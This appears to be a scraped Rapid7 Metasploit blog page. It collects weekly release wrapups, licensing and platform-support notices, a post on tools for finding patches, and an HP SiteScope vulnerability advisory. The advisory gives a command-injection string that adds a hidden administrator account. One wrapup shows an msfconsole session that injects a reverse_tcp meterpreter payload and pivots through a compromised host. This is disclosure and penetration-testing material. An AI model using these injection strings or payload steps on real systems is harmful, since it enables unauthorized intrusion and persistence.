Skip navigation
All Places > Metasploit > Blog
1 2 3 Previous Next

Metasploit

638 posts
egypt

Weekly Metasploit Wrapup

Posted by egypt Employee Jan 22, 2016

I'm not your mother, clean up after yourself.

 

An old friend of mine, axis2_deployer, is a fun authenticated code execution module that takes advantage of Axis2's ability to deploy new applications on a web server. It used to be a messy friend, leaving its files all over the living room floor for you to clean up manually. As of #6457, you don't have to worry about those files any more because it uses the FileDropper mixin. When you're writing a module that requires putting something on the file system, the polite thing to do is delete it when you're done and that's exactly what FileDropper is for. Just include the mixin and call register_file_for_cleanup with the remote path, and when a session is created Metsaploit will use it to delete your mess.

 

Code of Conduct

 

The wider development community has been talking about Codes of Conduct for a while now as a result of a lot of poor behavior. The Metasploit Project has been fortunate not to have had to deal with jerks on the scale that some other projects have, but in order to head those jerks off at the pass, Metasploit now has a Code of Conduct.

Here's an excerpt that explains the motivation:

  We are committed to making participation in this project a harassment-free   experience for everyone, regardless of level of experience, gender, gender   identity and expression, sexual orientation, disability, personal appearance,   body size, race, ethnicity, age, religion, or nationality.

This CoC provides a way for you to contact us and let us know about unacceptable behavior in the community as well as providing guidelines so people know what to expect when such things must be enforced.

  Project maintainers have the right and responsibility to remove, edit, or   reject comments, commits, code, wiki edits, issues, and other contributions   that are not aligned to this Code of Conduct, or to ban temporarily or   permanently any contributor for other behaviors that they deem inappropriate,   threatening, offensive, or harmful.

 

For developers and potential contributors, this means we've got your back. The goal is to give you confidence that if things go wrong, there is already a plan in place and rules that can help. I think it's also important to point out that there was zero dissent in the Pull Request discussion among current committers about whether to adopt this CoC. The building isn't currently on fire, but we as a community, and I personally, want you to be safe putting it out if one comes along.

 

The previous law of the land in the People's Republic of Metasploit was an informal adherance to Wheaton's Law, and that still stands. By adopting a more formal and explicit set of rules, we intend to foster a more welcoming environment where everyone feels comfortable making their first Pull Request.

 

New Modules

Auxiliary and post modules

 

Get it

 

As always, you can update to the latest Metasploit Framework with a simple msfupdate and the full diff is available on GitHub: 4.11.6...4.11.7

 

Happy hacking.

egypt

Weekly Metasploit Wrapup

Posted by egypt Employee Jan 11, 2016

Aaaaaand we're back! Last week was the first weekly update of the year and it comes with a super fun stuff.

Tunneling

The latest update allows you to tunnel reverse_tcp sessions over a compromised machine in a slightly less painful way. There is now a new datastore option, ReverseListenerComm, which lets you tell a meterpreter session tunnel connections back to your payload handler. Here's an example run to give you the idea:

 

msf exploit(payload_inject) > show options


Module options (exploit/windows/local/payload_inject):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   NEWPROCESS  true             no        New notepad.exe to inject to
   PID                          no        Process Identifier to inject of process to inject payload.
   SESSION                      yes       The session to run this module on. 

Payload options (windows/meterpreter/reverse_tcp):


   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (accepted: , , seh, thread, process, none)
   LHOST     127.0.0.1        yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:


   Id  Name
   --  ----
   0   Windows


msf exploit(payload_inject) > set ReverseListenerComm 1
ReverseListenerComm => 1

msf exploit(payload_inject) > set SESSION 1
SESSION => 1
msf exploit(payload_inject) > run 

[*] Started reverse handler on 127.0.0.1:4444 via the meterpreter on session 1
[*] Running module against WIN-2DE8F2QP867
[*] Launching notepad.exe...
[*] Preparing 'windows/meterpreter/reverse_tcp' for PID 3092
[*] Sending stage (884270 bytes)
[*] Meterpreter session 2 opened (192.168.5.101-192.168.5.1:4444 -> 127.0.0.1:63173) at 2015-05-20 00:09:44 +0100

meterpreter >

 

The really important line there is this:

[*] Started reverse handler on 127.0.0.1:4444 via the meterpreter on session 1

The compromised machine is listening on its localhost for the new connection, but it doesn't have to be localhost, you can tell it to listen on an external address and use psexec against a second internal machine. This used be possible by creating a route and setting your LHOST to a victim machine's IP address within that route, but it wasn't really clear how to do it and the settings were quite error prone; now it's just a single option to tell Metasploit explicitly where to listen for the payload.

Super fun modules

Joomla

This update comes with a pre-authentication exploit for Joomla, the popular CMS, another in a rich and storied history of deserialization bugs. We've also abstracted some common things into a Joomla mixin, so the next time one of these comes along, writing the exploit is will be faster and easier.

Hacking Time

hoff-hacking-time-500x333.jpg

From the module description:

The end goal is to cause ntpd to declare the legitimate peers "false tickers" and choose the attacking clients as the preferred peers, allowing these peers to control time.

Now you, too, can go... NAK to the Future!

 

Exploit modules

 

Auxiliary and post modules

 

 

As always, you can get all these modules and improvements with a simple msfupdate and the full diff is available on GitHub:  4.11.5-2015121501...4.11.5-2016010401

As a result of export restrictions placed on Metasploit Community and Pro trials, this year we have introduced some new systems to help process license requests. We have received a lot of questions about this, and this post will hopefully answer some of them for you. If you haven't read the original blog post about the export controls, please take a moment to review the information there on the updates and who is affected.

 

To help shed light on why some requests from those outside the U.S. or Canada for Metasploit Community or Pro license keys may be denied, below we list some common mistakes we've seen since this process began. To increase the likelihood of your request being quickly approved, be sure to avoid these pitfalls.

 

1) Supply a legitimate physical mailing address

All applications must include a valid physical mailing address, without exception. We frequently receive applications with blank information, gibberish, numbers, or dashes (e.g. -----,----- or 12345, 12345 or ghjghjgh, ghujhgjg).

  • Please only use Latin characters, without accents. Non-Latin characters, including Cyrillic, Arabic, Chinese, and Japanese characters, cannot be validated (e.g. 瑞安中心 6- 8海港路湾仔香港). Also, accents often render incorrectly, so please do not use any accented characters (e.g. 43 Rue Delarivi�re Lefoullon, Paris).
  • The address must be specific at a street level. Unfortunately geocodes to a neighborhood, city, or county level are not sufficient (e.g. Beijing, Beijing).
  • You must not be located in a U.S.-embargoed country: Cuba, Crimea, North Korea, Iran, Sudan, or Syria.

 

2) Disclose any government affiliations clearly in your application

In addition to address-related issues, we also have seen a number of problems relating to applications from government agencies. Sometimes we'll receive an application from an agency that either is not eligible for an exemption from export restrictions, or did not self-identify as a government agency when applying. In both cases these kinds of applications will be rejected.

 

We realize this application process may seem cumbersome and appreciate your patience as we process your license key request, as each application is manually and individually verified by a legal team. We only ask for information that is required by the U.S. Government export regulations, so please note that omitting or falsifying any information on the application form will most certainly invalidate your application.

 

As always, if you are outside the U.S. or Canada and interested in evaluating Metasploit Pro, don't hesitate to reach out to your Account Executive directly. We appreciate your cooperation as we work to comply with U.S. government regulations.

egypt

Weekly Metasploit Wrapup

Posted by egypt Employee Dec 17, 2015

Welcome to the last Metasploit update of the year! Since January 1st, 2015, we've had 6364 commits from 176 unique authors, closed 1119 Pull Requests, and added 323 modules. Thank you all for a great year! We couldn't have done it without you.

 

Sounds

 

The sounds plugin has been around for a long time, notifying hackers of new shells via their speakers since 2010. Recently, Wei sinn3r Chen gave it a makeover, replacing the old robotic voice with that of Offensive Security founder, Kali Linux Core Developer, and all-around cool guy Mati "muts" Aharoni. Now when you get a new session, you'll be treated to his sultry voice congratulating you and when an exploit fails, he'll encourage you to try harder. Just type "load sounds" in msfconsole to hear it in action.

 

New Modules

 

We have eight new modules this week -- 5 exploits and 3 post modules. Among them is an exploit for Jenkins that takes advantage of the java deserialization issue brought to the world's attention by FoxGlove Security a few weeks ago. More exploits for similar vulnerabilities are undoubtedly on the way.

 

Exploit modules

 

Auxiliary and post modules

 

Get it

As always, you can get all these modules and improvements with a simple msfupdate and the full diff is available on GitHub: 4.11.5-2015120901...4.11.5-2015121501

egypt

Weekly Metasploit Wrapup

Posted by egypt Employee Dec 11, 2015

Payloads

 

New in the latest Metasploit release are stageless HTTP and HTTPS payloads for Python for those times when you would rather have the whole thing in one file instead of having to stage it. For more on the advantages and quirks of stageless payloads, check out @OJ's post on the subject from when support was first added for Windows.

 

Exploit Modules

 

Does anybody remember that bash(1) bug from a little over a year ago? The one with environment variables getting executed as functions or something? Man, those celebrity bugs, they go off to rehab and everybody forgets about them. Well, Advantech forgot at least, since their EKI Modbus gateways use a vulnerable version of bash to serve cgi scripts. In all seriousness, Shellshock will be with us for a very long time, cropping up in production systems and embedded devices like this for many years to come. Despite the frequent comparison with Heartbleed because of the hype at the time, I personally think it's a much more useful bug. Full shell access is better than memory read access any day of the week.

 

So next time you're doing a pentest and you see something embedded, why not try a little Shellshock?

why-not-shellshock.png

 

Another fun module for this wrapup is for an old vulnerability, but part of a theme I always enjoy. For some background, chkrootkit(1) is a Linux security tool intended to discover whether a system is compromised via certain artifacts such as files commonly left around by worms. One of the checks it does is for a file named /tmp/update. Unfortunately, due to some missing quotes, vulnerable versions of chkrootkit won't just check for existence of that file, but will run it instead. As root. Now, I'd be remiss not to mention that this was patched by all the major distributions in mid-2014 and it's the kind of thing you don't usually find on embedded devices. So in contrast to bash, which is installed by default on just about every kind of device you can think of, you're not going to run into it all that often. It's still a fun bug.

 

Performance Improvements

 

Thanks to the work of community contributors Jon Cave and Meatballs, meterpreter file downloads and uploads have improved considerably. While there is still some room for improvement in this area, it's now possible to upload and download files in the tens of megabytes range in a reasonable amount of time across all the meterpreter implementations. Interestingly, Python meterpreter was the fastest in my testing, pulling down a 32MB file in 19 seconds, or roughly 13.47Mb/s.

 

Exploit modules

 

Auxiliary and post modules

 

Get It

 

As always, all the changes since the last wrapup can be had with a simple msfupdate and the full diff is available on github: 4.11.5-2015111801...4.11.5-2015120901

egypt

Weekly Metasploit Wrapup

Posted by egypt Employee Nov 20, 2015

Python extension for Windows Meterpreter

 

Meterpreter offers some pretty powerful post-exploitation capabilities, from filesystem manipulation to direct Windows API calls with railgun, and everything in between.

 

One thing that's been missing for a long time is on-victim scripting. With this update comes an experimental Python extension to remedy that. It's still in its infancy, so expect some kinks to be worked out over the next few weeks, but it is functional. OJ's excellent Pull Request offers some insights into how it works and where it's going.

 

New Modules

 

This update also includes a few PHP code execution exploits, including one for the very popular vBulletin, a cheeky one for a cute backdoor used by Chinese attackers according to the great analysis by FireEye, and one for Up.Time.

 

Up.Time, the tale of a bad patch

 

In late 2013, we published an exploit module by Denis Andzakovic targetting Up.Time, an IT infrastructure monitoring tool. As part of the initial advisory, the researcher quoted the vendor saying

As a policy to protect our customers, we do not discuss any vulnerabilities with outside companies.

Which apparently includes the person reporting the vulnerability.

 

And indeed, there doesn't seem to be any public discussion of this vuln (or any others for that matter) from the vendor, not even a mention of when a patch was available. It turns out that, whenever that patch came out, it didn't actually fix the vulnerability and thanks to contributors Ewerson Guimaraes and Gjoko Krstic, we now have an exploit that targets the latest Up.Time versions 7.4 and 7.5.

 

Exploit modules

 

Auxiliary and post modules

 

 

Get it

 

As always, all the changes since the last wrapup can be had with a simple msfupdate and the full diff is available on github: 4.11.5-2015110801...4.11.5-2015111801

egypt

Weekly Metasploit Wrapup

Posted by egypt Employee Nov 6, 2015

One of the greatest things about Metasploit is that it supports lots of different protocols and technologies that you would otherwise need a huge menagerie of tools to be able to talk to, an ever-expanding bubble of interoperability that you didn't have to write. Due to some great ongoing work by Bigendian Smalls, the bubble is getting even bigger, now encompassing shell sessions on mainframes. You can see the beginnings in #6013 and #6067

 

New Modules

This update also comes with a fun privilege escalation exploit for OSX where an environment variable ends up on a commandline. I love these kinds of bugs because people have been screwing up environment variables since the invention of shells.

 

As always, you can see all the changes since the last wrapup on github: 4.11.4-2015102801...4.11.5-2015103001

 

Exploit modules

 

Auxiliary and post modules

egypt

Weekly Metasploit Wrapup

Posted by egypt Employee Oct 29, 2015

This week's update brings a fun user-assisted code execution bug in Safari. It works by opening up an "applescript://" URL, which pops an Applescript editor, and then getting the user to hit Command-R (normally the keybinding for reloading the page). The key combo will pass down to the editor and run the script.

 

There is a mitigating factor here in the form of Gatekeeper, part of Apple's "walled garden" architecture, designed to protect users from people who haven't given Apple $99. In it's default setting on Mountain Lion and newer, Gatekeeper will pop up a couple of "Are you sure?"s before letting the user give you a shell. But hey, signed Java applets are still moderately effective at getting shells in phishing campaigns in spite of click-to-play, so chances are still pretty good.

 

You can see all the changes since the last wrapup on github: 4.11.4-2015101401...4.11.4-2015102801

 

Exploit modules

 

Auxiliary and post modules

In August, we were getting a lot of questions about Kali 2. I have answered some questions in Metasploit on Kali Linux 2.0 blog post in the past. Today, I am pleased to announce that we extend our official platform support to three new operating systems which are now listed in Metasploit System Requirements page:

  • Kali Linux 2.0
  • Red Hat Enterprise Server 7.1 or later
  • Microsoft Windows Server 2012 R2

 

Since we have added Kali 2 as a supported operating system, we no longer support Kali 1.x. Please note that these changes are applicable to our closed source products which are Metasploit Community, Express, Pro. Since Metasploit Framework is an open source and free tool, we do not provide support for it.

 

Let me now try to cover some frequently asked questions:

 

What is the difference between Rapid7 officially supported and not supported platforms?

For every platform we list in our Metasploit System Requirements page, we perform automated testing before every release. Additionally, we perform full regression tests if we introduce a new feature. This ensures that we minimize the chance of introducing a defect. Beside from testing, we have a lab environment that includes each of the supported platforms so that when our customers report any issues, we can quickly reproduce those issues and address as soon as possible. Given these reasons, we highly recommend that you use a supported platform.

 

Kali 2 already comes with Metasploit Framework, how does this change affect me?

This announcement is only applicable to our closed source products which are Metasploit Community, Express, and Pro. Since Framework is an open source tool, we do not provide support for Metasploit Framework however you may still receive community support via IRC channel, and Rapid7 Community Discussions.

 

Additionally, we have recently released Metasploit Framework Open Source Installers. If you wish to always stay on updated version of Metasploit Framework, feel free to use the open source installers.

 

Kali 2 already comes with Metasploit Framework, can I still install Community, Express or Pro editions?

Yes, Kali 2 comes with a Metasploit Framework version, however you can still install any of our closed source edition of Metasploit without any issues. As I mentioned above, Express and Pro editions are now fully supported on Kali 2. Once you install Community, Express, or Pro editions, you will realize that the packages will install into a complete different path, thus it will not overwrite Kali provided Framework edition. However, you will be able to use the command line provided with Pro edition without issues.

 

Can I continue to use Kali 1.1?

If you wish to continue using Kali 1.1, you certainly can. Please keep in mind that it is no longer supported and we do not perform tests on this platform anymore. Thus it is highly possible that some things may not work as expected.

 

I have further questions, what do I do?

Feel free to provide comment to this thread, or send us a tweet.

 

Eray Yilmaz - @erayymz

Sr. Product Manager

Welcome to this week's Metasploit Wrapup. I'm your host Brent Cook, tagging in for egypt who just finished speaking about Metasploit at the Texas DIR Telecommunications Forum. This week was largely focused on bug fixes and refinements.

 

In the fixes bucket, PowerShell sessions now properly upgrade with the 'sessions -u' command. Fixing this also revealed some general problems handling PowerShell commands, which were also fixed. SRVHOST, like LHOST now supports tab completion, which is super useful rather than having to remember what your local IP addresses are.  Modules using SSL can now set advanced options, including support for TLS 1.2, and a similar fix was applied to SMB and TCP login scanner modules. We also fixed a bug preventing 64-bit Linux staged command payloads from running, which unlocks loading some more interesting 64-bit Linux payloads in the future.

 

As modules get used in more varied scenarios and environments, deficiencies in modules are often uncovered. As a result of your reports, MS SQL, IMAP and POP3 protocol handlers now handle network failures better. The Java RMI scanner is also more resilient when handling larger protocol responses. Even the venerable msfd now has a 'quiet' option, that makes it work nicely with dumb network clients.

 

Of course, there were a few new modules this week as well, including:

 

This is a vulnerability advisory for the HP SiteScope DNS Tool Command Injection vulnerability, made in accordance with Rapid7's disclosure policy.

 

Summary

 

Due to a problem with sanitizing user input, authenticated users of HP SiteScope running on Windows can execute arbitrary commands on affected platforms as the local SYSTEM account. While it is possible to set a password for the SiteScope application administrator, this is not enforced upon installation. Therefore, in default deployments, any user who can navigate to the SiteScope service may execute arbitrary commands on the underlying operating system. If a password is set, only authenticated users may do so, which is still an unexpected level of operating system access.

 

Product Description

 

HP SiteScope is an agentless application monitorting solution, provided by Hewlettt Packard to enterprise customers.

 

Credit

 

This issue was first discovered and reported by Kirk Hayes of Rapid7, Inc. and Charles Riggs of Knowledge Consulting Group.

 

Exploitation

 

Navigating to http://<server>:8080/SiteScope/servlet/Main will typically present any user with a control panel UI with the permissions of "SiteScope Administrator," as seen in the screenshot below.

 

 

Once logged in, an attacker may navigate to the DNS Tool, found under Tools > Network Tools > DNS Tool, and enter any domain name for resolution in the Host name to resolve field, and append any other valid operating system command with the usual techniques. For example, attempting to resolve `google.com & net user HPpoc QWERty1234 /ADD & net localgroup administrators HPpoc /ADD` results in successfully creating a user and adding the user to the local administrators group, as seen in the screenshot below:

 

 

An attacker may similarly append any operating system command in the DNS Server field as well.

 

A Metasploit module has been published that demonstrates the issue.

 

Mitigations

 

In order to mitigate this issue, users should only grant access to the SiteScope application web services only to users who are trusted to local system access on the machine SiteScope is installed on. Of course, users are also strongly encouraged to set a strong password for all SiteScope users.

 

Alternatively, users should host SiteScope on Linux platforms, and configure SiteScope to run as a non-root user. This advice appears to be the preferred mitigation from the vendor per discussions between the vendor and Rapid7. On Windows, SiteScope appears to require local SYSTEM access in order to perform intended functionality, so account permissions for the application or individual users would not appear to be effective on this operating system.

 

Disclosure Timeline

 

In accordance with with Rapid7's disclosure policy, the vendor was made aware of this issue at least 60 days prior to this advisory's publication.

 

  • Mon, Jun 01, 2015: Initial Discovery by Kirk Hayes and Charles Riggs
  • Tue, Jun 02, 2015: Validated current version's vulnerability (v11.30)
  • Thu, Jun 04, 2015: Offered to HP TippingPoint's ZDI program
  • Tue, Jun 30, 2015: Rejected by ZDI
  • Wed, Jul 01, 2015: Details disclosed to vendor, case # SSRT103139 assigned
  • Wed, Aug 19, 2015: Issue receipt acknowledged by vendor, mitigation suggested
  • Tue, Aug 25, 2015: Details disclosed to CERT
  • Mon, Aug 31, 2015: CERT assigned VU#626368
  • Fri, Oct 9, 2015: Public disclosure and Metasploit module published.

abigtoolbox.jpgThere are a wide variety of interesting and useful tools in the Metasploit Framework. Many of these are available from the top-level of Metasploit in the form of modules and library code. You can find countless tutorials and blogs about how to put msfconsole, msfvenom and other top-level commands to good use. However, not many people know about the 'tools' directory, which contains many useful, single-purpose scripts, with topics spanning from exploit development to statistics.

 

One of the problems with the tools directory is that it was not very well organized. Like a messy toolbox, it had grown organically over the years, making it difficult to find things. To correct this, we have reorganized the tools directory by category, making tools easier to discover and encouraging their use. The new categories are:

 

  • dev: tools for managing developer tasks
  • exploit: tools for developing exploits
  • modules: tools for gathering project statistics, checking code quality, and checking payloads
  • password: tools for extracting and cracking passwords
  • recon: tools for collecting target data

 

In the process, we found a few tools that may have outlived their usefulness. While we have not deleted anything yet, we may remove some obscure or unused tools in the future. Until then, please take a moment to check out the new cleaned-up tools directory and find something new! While you're there, be sure to check out our latest tool addition, MSU Finder.

Patch testing and analysis are important parts in vulnerability research and exploit development. One popular reason is people would try this technique to rediscover patched bugs, or find ways to keep an 0day alive in case the fix in place is inadequate. The same process is also used to find the range of builds affected by a vulnerability, which tends to be useful to predict the value of the exploit, improving target coverage and reliability.

 

Going through Microsoft patches is no easy task, though. There could be hundreds of advisories for the bug you're working on, each including different operating systems, different architectures, different languages, etc. Of course, there are tools publicly available that can search and patch whatever you're vulnerable to, but this is only great for regular use such as home or IT infrastructure. For research purposes, we usually don't want just one patch. We often want all (or most) that are associated with the product. Surprisingly, there seem to be no tools suitable for this kind of task. So we made a new tool called MSU Finder, and another called extract_msu.bat to extract patches.

 

MSU Finder

 

The main purpose of MSU Finder is to find the download links for Microsoft patches. You can also use it to find advisories of a given product, in case you are curious about how often something gets updated.

 

Technet Search Engine

 

The tool supports two ways to find Microsoft advisories: The first and default one is via Technet. In this mode, MSU Finder will check against pre-defined product list from Technet, and return all the ones that match. If nothing matches, the tool will just perform a more generic search. The Technet search engine allows you to search by MSB, KB, or CVE number.

 

Google Custom Search API

 

The other search engine MSU Finder supports is Google Custom Search API. The request is equivalent to the following Google search:

 

SEARCH_QUERY site:technet.microsoft.com intitle:"Microsoft Security Bulletin" -"Microsoft Security Bulletin Summary"

 

To be able to use the Google engine, you need to get an API key and a Search Engine ID:

 

  1. Have a Gmail account
  2. Go to Google Developer's Console
    1. Enable Custom Search API
    2. Create a credential. This credential is the API key.
  3. Go to Custom Search
    1. Create a new search engine
    2. Under Sites to Search, set it to: technet.microsoft.com
    3. In your search site, get the Search Engine ID under the Basics tab.

 

Usage

 

MSU Finder currently has a bit of learning curve. First off, the -q argument is mandatory. An important thing to understand is that the script will find advisories associated with that string, and then give you ALL the download links. And by "ALL", I mean all of it. For example, if your -q is "Internet Explorer 11", you will also get download links for other IE versions because they are all associated with the same advisory (vulnerability). So to narrow down your results more, you will need the -r option as well.

 

For example, if you want to look for IE 11 patches for x86, use a more narrow query like this:

 

$ ruby tools/exploit/msu_finder.rb -q "Internet Explorer 11" -r "^IE11.+x86"

 

The -r option is a regular expression (regex) filter for the download link. This method works well if you are already familiar with Microsoft's patch naming convention, which typically begins with the product name or the operating system. You may need to play with this a little bit to get the hang of it. Even if you can't find an appropriate regex, it's okay. Download them anyway, and then on Windows you can sort files by modified date or product version, and then it will become apparent which ones you want, or don't want.

 

If you are not sure which advisories might get picked up by the search, try the -d option. This will only show you advisories numbers without actually fetching any links:

 

$ ruby tools/exploit/msu_finder.rb -q "Internet Explorer (10|11)" -d

 

Finally, MSU Finder does not include the ability to download patches directly, but you can save the links to a file and use a tool like wget to download them:

 

$ ruby tools/exploit/msu_finder.rb -q "ms15-100" -r x86 > /tmp/list.txt && wget -i /tmp/list.txt

 

To learn more about MSU Finder, please use the -h flag.

 

extract_msu.bat

 

As the name implies, this tool can extract Microsoft patches, specifically MSU files. It only runs on Windows, because it basically uses the expand command to extract. To use this:

 

  1. Start a Windows machine (XP or higher, so you have the `expand` command available)
  2. Copy extract_msu.bat onto the Windows machine
  3. Put all the MSU files in the same directory
  4. Run: extract_msu.bat [absolute path to the directory]
  5. As the tool runs, it will create a new folder for each MSU. And then in that new folder, there's another sub-folder named "extracted", that's where you can find the actual file(s) the patch wants to install. Now, since you're on Windows, you can search whatever DLL (or EXE) you are looking for, and then easily sort by creation date, product version, etc. Or, you can copy and paste all the found files onto the same folder, and then use whatever 3rd-party tool for additional analysis.

 

Both of these tools are now available for the Metasploit Framework. You can use MSU Finder to find you advisories or even be leveraged to automatically download patches. After downloading, you can use extract_msu.bat to extract them. After the patches are extracted, you can easily search for the actual components you want, put them in one place, and now you have a nice collection of release builds for research or development purposes.

 

To get your hands on these tools, please feel free to download Metasploit Framework, or git clone. If you are already a Metasploit user, you can run the msfupdate to receive them. To report a bug, or request additional features, please submit them to our metasploit-framework Github.

egypt

Weekly Metasploit Wrapup

Posted by egypt Employee Oct 7, 2015

Welcome to another edition of the increasingly inaccurately named Weekly Wrap up! I'm egypt and I'll be your host. Since the last one of these, a lot of work has landed on the Framework. I talked about some of it with a bit of a yearly wrapup at my Derbycon talk. We also had a fun time at the Metasploit Townhall.

 

One of the recent things I didn't cover is the super cool BusyBox work by Javier Vicente Vallejo. For those who aren't familiar, BusyBox is a small, usually statically compiled, shell environment for resource-constrained systems like SOHO routers (which we've talked about quite a bit here on the Metasploit blog). From the official website:

BusyBox combines tiny versions of many common UNIX utilities into a single small executable. It provides replacements for most of the utilities you usually find in GNU fileutils, shellutils, etc. The utilities in BusyBox generally have fewer options than their full-featured GNU cousins; however, the options that are included provide the expected functionality and behave very much like their GNU counterparts. BusyBox provides a fairly complete environment for any small or embedded system.

 

BusyBox has been written with size-optimization and limited resources in mind. It is also extremely modular so you can easily include or exclude commands (or features) at compile time. This makes it easy to customize your embedded systems. To create a working system, just add some device nodes in /dev, a few configuration files in /etc, and a Linux kernel.

BusyBox is used all over the place with all sorts of different configurations and, as a result of its modular design, many deployments are stripped down to the bare minimum requirements of a given system. That means significant environment-specific limitations from a post-exploitation perspective. Having a collection of tools for working with it after you've compromised a device can save a lot of time over figuring out what particular handicaps a given busybox has been compiled with.

 

We also released our shiny new Omnibus installer, with support for Windows, Linux, and OSX, for your Open Source installation pleasure.

 

As always, feel free to check the diffs from the last blog checkpoint, over on GitHub.

 

Exploit modules

 

Auxiliary and post modules

Screen Shot 2015-10-06 at 10.34.13 AM.pngRapid7 has long supplied universal Metasploit installers for Linux and Windows. These installers contain both the open source Metasploit Framework as well as commercial extensions, which include a graphical user interface, metamodules, wizards, social engineering tools and integration with other Rapid7 tools. While these features are very useful, we recognized that they are not for everyone. According to our recent survey of Metasploit Community users, most only used it for the open source components, preferring to use the command-line tools over the graphical ones. Also, while we do our best to ensure that Metasploit Community and Pro releases are of high quality, they are not always supplied with the latest hot new exploits and payloads available in Metasploit Framework.

 

Screen Shot 2015-10-06 at 10.28.58 AM.pngWhile it has always been possible to simply setup a development environment and run the latest metasploit-framework code from github directly, it can still be tricky to setup and keep up to date. Kali Linux 2.0 now publishes the open source pieces of Metasploit Framework with its distribution, but the release schedule still follows that of Metasploit Community / Pro editions, and it of course does not necessarily help those who prefer other operating systems.

 

Screen Shot 2015-10-06 at 10.29.58 AM.pngTo address the needs of open source enthusiasts, those needing more frequent updates, or those simply looking for an easy way to setup a database for Metasploit Framework development use, we have created Open Source installers for Metasploit Framework for Windows, OS X and Linux x86 and x86-64 platforms. These installers utilize the Omnibus tool from chef in order to package everything needed to run Metasploit Framework, from dependent libraries, specific Ruby versions up to a built-in PostgreSQL database. The installers are easy to install and get up and running in seconds. They are also built and tested automatically each night, so you can always run 'msfupdate' and get the latest exploits and payloads without having to setup a development environment. The installers also integrate with your OSes native package manager, be it Linux RPM or DEB-based, MSI for Windows or PKG for OS X. That makes them easy to uninstall as well.

 

For information about how to install and use these new packages, see our wiki page on the Metasploit Framework project github project. The installers themselves are also open source. So if you see a problem, pull requests or issue reports are very welcome! Note that in addition to these Metasploit-specific installers, there are other ways to get Metasploit Framework, such as through Dave Kennedy's PenTester Framework or even pre-installed in Kali Linux. The Metasploit Framework omnibus installers provide another way to get the open source Metasploit Framework running on a variety of platforms quickly and easily.

Filter Blog

By date: By tag: